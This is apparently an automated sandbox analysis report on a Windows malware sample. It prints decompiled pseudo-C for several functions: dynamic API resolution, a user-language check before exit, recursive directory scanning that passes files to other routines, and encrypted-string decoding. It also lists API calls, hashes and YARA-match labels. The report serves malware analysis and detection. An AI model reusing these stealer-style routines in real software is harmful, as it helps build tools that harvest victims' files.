                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C8D
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CA3
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CB9
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CCF
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CE5
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CFB
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D11
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D27
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D3D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1414494784-0
                                                                                                                              • Opcode ID: 58486a194a5fa7c9e0895ca89602c1772722cfd4ff567d32561cfc0f0ce1c961
                                                                                                                              • Instruction ID: 3fba8ac80aa5c540b0fc98707dc2ae831dd85e2daf6e5e453931519099b09345
                                                                                                                              • Opcode Fuzzy Hash: 58486a194a5fa7c9e0895ca89602c1772722cfd4ff567d32561cfc0f0ce1c961
                                                                                                                              • Instruction Fuzzy Hash: A7D0C9303142285295143BF77A13B9E328C5F95759F88542BFA19845D3EE8CE890D07F
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421400, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00421400() {
				void* _t3;
				void* _t4;
				void* _t6;
				void* _t8;

				E00423050(0x4326f8); // executed
				E00419700(0x4326f8); // executed
				_t3 = E0041F4A0(); // executed
				_t9 = _t3;
				if(_t3 != 0) {
					_t4 = E0041B700(0x4326f8, _t8, _t9); // executed
					_t10 = _t4;
					if(_t4 != 0) {
						E00420BE0(_t6, _t10); // executed
					}
				}
				ExitProcess(0);
			}







                                                                                                                              0x00421408
                                                                                                                              0x0042140d
                                                                                                                              0x00421412
                                                                                                                              0x00421417
                                                                                                                              0x00421419
                                                                                                                              0x0042141b
                                                                                                                              0x00421420
                                                                                                                              0x00421422
                                                                                                                              0x00421424
                                                                                                                              0x00421424
                                                                                                                              0x00421422
                                                                                                                              0x0042142b

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02338488), ref: 00419752
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,023377B0), ref: 00419767
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02338518), ref: 0041977D
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,023383B0), ref: 00419793
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,023383C8), ref: 004197A8
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02338590), ref: 004197BE
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02338470), ref: 004197D4
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,023375B0), ref: 004197E9
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,023378B0), ref: 004197FF
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02338380), ref: 00419815
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02337730), ref: 0041982A
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02338530), ref: 00419840
                                                                                                                                • Part of subcall function 00419700: GetProcAddress.KERNEL32(00000000,02337690), ref: 00419856
                                                                                                                                • Part of subcall function 0041F4A0: GetUserDefaultLangID.KERNEL32 ref: 0041F4AD
                                                                                                                              • ExitProcess.KERNEL32 ref: 0042142B
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C1F
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C35
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C4B
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C61
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C77
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C8D
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CA3
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CB9
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CCF
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CE5
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420CFB
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D11
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D27
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420D3D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$AddressProc$DefaultExitLangProcessUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 82748119-0
                                                                                                                              • Opcode ID: 32394bd129dc164cd11832438fddca6f2a7be9a9b6adeee2cc25a03872417eb2
                                                                                                                              • Instruction ID: 6fb307640b029766a7fb4233a35ca454179d9a6499e425c111d59f27594913c5
                                                                                                                              • Opcode Fuzzy Hash: 32394bd129dc164cd11832438fddca6f2a7be9a9b6adeee2cc25a03872417eb2
                                                                                                                              • Instruction Fuzzy Hash: 2DD0C9303142281295143BF76A1375E31885F95759F88102BEA19841D2EE8CE880807F
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004055AB, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 25%
                                                                                                                              			E004055AB(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E004054EF(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                                                                                                                              0x004055b0
                                                                                                                              0x004055b2
                                                                                                                              0x004055b5
                                                                                                                              0x004055b8
                                                                                                                              0x004055c1

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fsopen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3646066109-0
                                                                                                                              • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                              • Instruction ID: 5b05c73125da1926053be9fb26bd22456a7e96449116a2bcf6d461872288d809
                                                                                                                              • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                              • Instruction Fuzzy Hash: C1C09B7244010C77CF111943DC02F563F19D7C0764F044021FB1C1D1619577D5659689
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004055AB, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 25%
                                                                                                                              			E004055AB(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E004054EF(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                                                                                                                              0x004055b0
                                                                                                                              0x004055b2
                                                                                                                              0x004055b5
                                                                                                                              0x004055b8
                                                                                                                              0x004055c1

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fsopen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3646066109-0
                                                                                                                              • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                              • Instruction ID: 5b05c73125da1926053be9fb26bd22456a7e96449116a2bcf6d461872288d809
                                                                                                                              • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                              • Instruction Fuzzy Hash: C1C09B7244010C77CF111943DC02F563F19D7C0764F044021FB1C1D1619577D5659689
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C670, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041C670() {
				int _t2;

				_t2 = FreeLibrary( *0x43274c); // executed
				return _t2;
			}




                                                                                                                              0x0041c679
                                                                                                                              0x0041c680

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeLibrary
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3664257935-0
                                                                                                                              • Opcode ID: 06ebcda954c8efed7623fbeaa734fc165b916da4c9d32b0480696a03403f6e26
                                                                                                                              • Instruction ID: 5c465659f1241fb045ba90c5d16aa579a6afb78240756381b75dedf848ff1fda
                                                                                                                              • Opcode Fuzzy Hash: 06ebcda954c8efed7623fbeaa734fc165b916da4c9d32b0480696a03403f6e26
                                                                                                                              • Instruction Fuzzy Hash: A6B01271100308C7850057D9BE08815339CE74C5007002020B10883120C7A0B4004669
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040829B, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000,0040FBD0,004314A0,00000314,00000000,?,?,?,?,?,00409837,004314A0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040829D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: b1d5483f02894e43c792c39b6c48b5267291dd99513758d69e4c122340a36f96
                                                                                                                              • Instruction ID: c383b3ccbb15514a8cee800333098f99a1a1b38af0a967ff43c9ff14ff01edf9
                                                                                                                              • Opcode Fuzzy Hash: b1d5483f02894e43c792c39b6c48b5267291dd99513758d69e4c122340a36f96
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A670, Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041A670(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _t20;

				_v12 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = LocalAlloc(0x40, _a8 + 1); // executed
					_v12 = _t20;
					if(_v12 != 0) {
						_v8 = 0;
						while(_v8 < _a8) {
							 *((char*)(_v12 + _v8)) =  *((intOrPtr*)(_a4 + _v8));
							_v8 = _v8 + 1;
						}
					}
				}
				return _v12;
			}






                                                                                                                              0x0041a676
                                                                                                                              0x0041a681
                                                                                                                              0x0041a692
                                                                                                                              0x0041a698
                                                                                                                              0x0041a69f
                                                                                                                              0x0041a6a1
                                                                                                                              0x0041a6b3
                                                                                                                              0x0041a6c9
                                                                                                                              0x0041a6b0
                                                                                                                              0x0041a6b0
                                                                                                                              0x0041a6b3
                                                                                                                              0x0041a69f
                                                                                                                              0x0041a6d3

                                                                                                                              APIs
                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000001), ref: 0041A692
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocLocal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3494564517-0
                                                                                                                              • Opcode ID: f62b4cc9df38aef14b84487fe742b955498fe79851fa3c667fef58cb3f26ec8b
                                                                                                                              • Instruction ID: 6f218876d02809b0f930414e878dbd73697476ed213fc8bb2e3011cf8be7acb7
                                                                                                                              • Opcode Fuzzy Hash: f62b4cc9df38aef14b84487fe742b955498fe79851fa3c667fef58cb3f26ec8b
                                                                                                                              • Instruction Fuzzy Hash: 9A01FB30905108EBCB04DF98C5857EC7BB1EF04308F288099D9466B394C3795EA8DF4A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 0041D360, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 195fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0041D360(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				intOrPtr* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t84;
				intOrPtr* _t90;
				intOrPtr* _t94;
				void* _t98;
				void* _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t116;
				CHAR* _t117;
				char _t119;
				char _t124;
				intOrPtr _t127;
				char _t136;
				char _t137;
				intOrPtr _t144;
				void* _t157;
				void* _t158;
				signed int _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t164;

				_t158 = __esi;
				_t157 = __edi;
				_t116 = __ebx;
				_t84 =  *0x4301f4; // 0xe687535
				_v8 = _t84 ^ _t159;
				_t117 =  *0x4324d0; // 0x2336830
				_t138 =  &_v276;
				wsprintfA( &_v276, _t117, _a8);
				_t161 = _t160 + 0xc;
				_v280 = FindFirstFileA( &_v276,  &_v604);
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t90 = _v876;
							_t119 =  *_t90;
							_v877 = _t119;
							if(_t119 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t94 = _v896;
										_t124 =  *_t94;
										_v897 = _t124;
										if(_t124 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												wsprintfA( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
												_t144 =  *0x432474; // 0x23368a8
												_t98 = E004052FA(_t158,  &(_v604.cFileName), _t144);
												_t163 = _t161 + 0x18;
												if(_t98 != 0) {
													_t127 =  *0x4320c8; // 0x23361f0
													_t99 = E004052FA(_t158,  &(_v604.cFileName), _t127);
													_t164 = _t163 + 8;
													if(_t99 != 0) {
														_t100 =  *0x4322f4; // 0x23368c0
														_t101 = E004052FA(_t158,  &(_v604.cFileName), _t100);
														_t161 = _t164 + 8;
														if(_t101 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
																_t161 = _t161 + 0xc;
															}
														} else {
															E0041CDE0(_t116, _t157, _t158, _a4, _a12, _a8);
															E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
															_t161 = _t161 + 0x18;
														}
													} else {
														E0041B950(_t116, _t157, _t158,  &_v868, _a4, _a12);
														E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
														_t161 = _t164 + 0x18;
													}
												} else {
													E0041BB00(_t116, _t157, _t158,  &_v868, _a4, _a12);
													E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
													_t161 = _t163 + 0x18;
												}
												goto L27;
											}
											goto L18;
										}
										_t94 = _v896;
										_t136 =  *((intOrPtr*)(_t94 + 1));
										_v898 = _t136;
										_t41 = _v892 + 1; // 0x2500002e
										if(_t136 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t94;
									goto L17;
								}
							}
							_t90 = _v876;
							_t137 =  *((intOrPtr*)(_t90 + 1));
							_v878 = _t137;
							_t19 = _v872 + 1; // 0x2e000000
							if(_t137 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 = _v872 + 2;
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t90;
						goto L9;
						L27:
					} while (FindNextFileA(_v280,  &_v604) != 0);
					_t138 = _v280;
					_t89 = FindClose(_v280);
					goto L29;
				} else {
					L29:
					return E00404354(_t89, _t116, _v8 ^ _t159, _t138, _t157, _t158);
				}
			}










































                                                                                                                              0x0041d360
                                                                                                                              0x0041d360
                                                                                                                              0x0041d360
                                                                                                                              0x0041d369
                                                                                                                              0x0041d370
                                                                                                                              0x0041d377
                                                                                                                              0x0041d37e
                                                                                                                              0x0041d385
                                                                                                                              0x0041d38b
                                                                                                                              0x0041d3a2
                                                                                                                              0x0041d3af
                                                                                                                              0x0041d3b6
                                                                                                                              0x0041d3b6
                                                                                                                              0x0041d3c6
                                                                                                                              0x0041d3cc
                                                                                                                              0x0041d3cc
                                                                                                                              0x0041d3d2
                                                                                                                              0x0041d3d4
                                                                                                                              0x0041d3e2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041d3eb
                                                                                                                              0x0041d41e
                                                                                                                              0x0041d41e
                                                                                                                              0x0041d435
                                                                                                                              0x0041d43b
                                                                                                                              0x0041d448
                                                                                                                              0x0041d4e2
                                                                                                                              0x00000000
                                                                                                                              0x0041d44e
                                                                                                                              0x0041d44e
                                                                                                                              0x0041d45e
                                                                                                                              0x0041d464
                                                                                                                              0x0041d464
                                                                                                                              0x0041d46a
                                                                                                                              0x0041d46c
                                                                                                                              0x0041d47a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041d483
                                                                                                                              0x0041d4b6
                                                                                                                              0x0041d4b6
                                                                                                                              0x0041d4cd
                                                                                                                              0x0041d4d3
                                                                                                                              0x0041d4e0
                                                                                                                              0x0041d4fe
                                                                                                                              0x0041d507
                                                                                                                              0x0041d515
                                                                                                                              0x0041d51a
                                                                                                                              0x0041d51f
                                                                                                                              0x0041d557
                                                                                                                              0x0041d565
                                                                                                                              0x0041d56a
                                                                                                                              0x0041d56f
                                                                                                                              0x0041d5a4
                                                                                                                              0x0041d5b1
                                                                                                                              0x0041d5b6
                                                                                                                              0x0041d5bb
                                                                                                                              0x0041d5f6
                                                                                                                              0x0041d60a
                                                                                                                              0x0041d60f
                                                                                                                              0x0041d60f
                                                                                                                              0x0041d5bd
                                                                                                                              0x0041d5c9
                                                                                                                              0x0041d5e3
                                                                                                                              0x0041d5e8
                                                                                                                              0x0041d5e8
                                                                                                                              0x0041d571
                                                                                                                              0x0041d580
                                                                                                                              0x0041d59a
                                                                                                                              0x0041d59f
                                                                                                                              0x0041d59f
                                                                                                                              0x0041d521
                                                                                                                              0x0041d530
                                                                                                                              0x0041d54a
                                                                                                                              0x0041d54f
                                                                                                                              0x0041d54f
                                                                                                                              0x00000000
                                                                                                                              0x0041d51f
                                                                                                                              0x00000000
                                                                                                                              0x0041d4e0
                                                                                                                              0x0041d485
                                                                                                                              0x0041d48b
                                                                                                                              0x0041d48e
                                                                                                                              0x0041d49a
                                                                                                                              0x0041d49d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041d49f
                                                                                                                              0x0041d4a6
                                                                                                                              0x0041d4b4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041d4b4
                                                                                                                              0x0041d4c2
                                                                                                                              0x0041d4c4
                                                                                                                              0x0041d4c7
                                                                                                                              0x00000000
                                                                                                                              0x0041d4c7
                                                                                                                              0x0041d448
                                                                                                                              0x0041d3ed
                                                                                                                              0x0041d3f3
                                                                                                                              0x0041d3f6
                                                                                                                              0x0041d402
                                                                                                                              0x0041d405
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041d407
                                                                                                                              0x0041d40e
                                                                                                                              0x0041d41c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041d41c
                                                                                                                              0x0041d42a
                                                                                                                              0x0041d42c
                                                                                                                              0x0041d42f
                                                                                                                              0x00000000
                                                                                                                              0x0041d612
                                                                                                                              0x0041d626
                                                                                                                              0x0041d62e
                                                                                                                              0x0041d635
                                                                                                                              0x00000000
                                                                                                                              0x0041d3b1
                                                                                                                              0x0041d63b
                                                                                                                              0x0041d648
                                                                                                                              0x0041d648

                                                                                                                              APIs
                                                                                                                              • wsprintfA.USER32 ref: 0041D385
                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041D39C
                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041D620
                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0041D635
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                              • String ID: %s\%s
                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                              • Opcode ID: c49c3285ecb05f5683d9ddeabd609b6d1b2e2c7352a1e30b0cf6d5982bb404fd
                                                                                                                              • Instruction ID: 8d6772620004ab98778aaf826b3c11eb8719ab671def5e114653b2d69454eaec
                                                                                                                              • Opcode Fuzzy Hash: c49c3285ecb05f5683d9ddeabd609b6d1b2e2c7352a1e30b0cf6d5982bb404fd
                                                                                                                              • Instruction Fuzzy Hash: 86815BB1D04228ABCB26CF64DC85BEAB7B9BB58300F0486DAE51D57241D734ABC4CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C900, Relevance: 7.6, APIs: 5, Instructions: 111stringencryptionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 21%
                                                                                                                              			E0041C900(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				BYTE* _v12;
				char _v16;
				int _v20;
				DWORD* _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v8132;
				BYTE* _v8136;
				DWORD* _v8140;
				DWORD* _v8144;
				char _v8148;
				intOrPtr* _v8152;
				intOrPtr _v8156;
				char _v8157;
				int _v8164;
				signed int _t53;
				intOrPtr _t65;
				intOrPtr _t70;
				void* _t75;
				void* _t93;
				void* _t94;
				signed int _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_t94 = __esi;
				_t93 = __edi;
				_t75 = __ebx;
				E00412A40(0x1fe0);
				_t53 =  *0x4301f4; // 0xe687535
				_v32 = _t53 ^ _t95;
				_v20 = 0x1fa0;
				_v24 = 0;
				_v8136 = 0x4293ae;
				E004091C0( &_v8132, 0, 0x1fa0);
				_t97 = _t96 + 0xc;
				_v8152 = _a4;
				_v8156 = _v8152 + 1;
				do {
					_v8157 =  *_v8152;
					_v8152 = _v8152 + 1;
				} while (_v8157 != 0);
				_v8164 = _v8152 - _v8156;
				_t90 = _v8164;
				if(CryptStringToBinaryA(_a4, _v8164, 1,  &_v8132,  &_v20, 0, 0) != 0) {
					_v24 =  *0x432708();
					if(_v24 == 0) {
						_t90 = _v8136;
						 *0x4328c4(_v8136, 0x42942d);
					} else {
						_t65 =  *0x432748(_v24, 1, 0);
						_t98 = _t97 + 0xc;
						_v28 = _t65;
						if(_v28 != 0) {
							 *0x4328c4(_v8136, 0x429417);
						} else {
							_v12 =  &_v8132;
							_v8 = _v20;
							_v8144 = 0;
							_v8140 = 0;
							_t70 =  *0x432728( &_v16,  &_v8148, 0);
							_t98 = _t98 + 0xc;
							_v28 = _t70;
							if(_v28 != 0) {
								_t90 = _v8136;
								 *0x4328c4(_v8136, 0x4293af);
							} else {
								_t90 =  &_v8132;
								E00409240( &_v8132, _v8144, _v8140);
								_t98 = _t98 + 0xc;
								 *((char*)(_t95 + _v8140 - 0x1fc0)) = 0;
								_v8136 =  &_v8132;
							}
						}
						 *0x432730(_v24);
					}
				}
				return E00404354(_v8136, _t75, _v32 ^ _t95, _t90, _t93, _t94);
			}





























                                                                                                                              0x0041c900
                                                                                                                              0x0041c900
                                                                                                                              0x0041c900
                                                                                                                              0x0041c908
                                                                                                                              0x0041c90d
                                                                                                                              0x0041c914
                                                                                                                              0x0041c917
                                                                                                                              0x0041c91e
                                                                                                                              0x0041c925
                                                                                                                              0x0041c93d
                                                                                                                              0x0041c942
                                                                                                                              0x0041c948
                                                                                                                              0x0041c957
                                                                                                                              0x0041c95d
                                                                                                                              0x0041c965
                                                                                                                              0x0041c96b
                                                                                                                              0x0041c972
                                                                                                                              0x0041c987
                                                                                                                              0x0041c99e
                                                                                                                              0x0041c9b1
                                                                                                                              0x0041c9bd
                                                                                                                              0x0041c9c4
                                                                                                                              0x0041ca9d
                                                                                                                              0x0041caa4
                                                                                                                              0x0041c9ca
                                                                                                                              0x0041c9d2
                                                                                                                              0x0041c9d8
                                                                                                                              0x0041c9db
                                                                                                                              0x0041c9e2
                                                                                                                              0x0041ca83
                                                                                                                              0x0041c9e8
                                                                                                                              0x0041c9ee
                                                                                                                              0x0041c9f4
                                                                                                                              0x0041c9f7
                                                                                                                              0x0041ca01
                                                                                                                              0x0041ca18
                                                                                                                              0x0041ca1e
                                                                                                                              0x0041ca21
                                                                                                                              0x0041ca28
                                                                                                                              0x0041ca68
                                                                                                                              0x0041ca6f
                                                                                                                              0x0041ca2a
                                                                                                                              0x0041ca38
                                                                                                                              0x0041ca3f
                                                                                                                              0x0041ca44
                                                                                                                              0x0041ca4d
                                                                                                                              0x0041ca5b
                                                                                                                              0x0041ca5b
                                                                                                                              0x0041ca75
                                                                                                                              0x0041ca8d
                                                                                                                              0x0041ca93
                                                                                                                              0x0041c9c4
                                                                                                                              0x0041cabd

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041C93D
                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041C9A9
                                                                                                                              • lstrcat.KERNEL32(?,004293AF), ref: 0041CA6F
                                                                                                                              • lstrcat.KERNEL32(?,00429417), ref: 0041CA83
                                                                                                                              • lstrcat.KERNEL32(?,0042942D), ref: 0041CAA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$BinaryCryptString_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 351459361-0
                                                                                                                              • Opcode ID: 27e67521fcb4946290682626cc12c91d94e13242a25856a399c3c5753c7069ad
                                                                                                                              • Instruction ID: ede58a91b6acc3c9de34702f063b24e786dbcff6da73a4c054eb46c9bc76c427
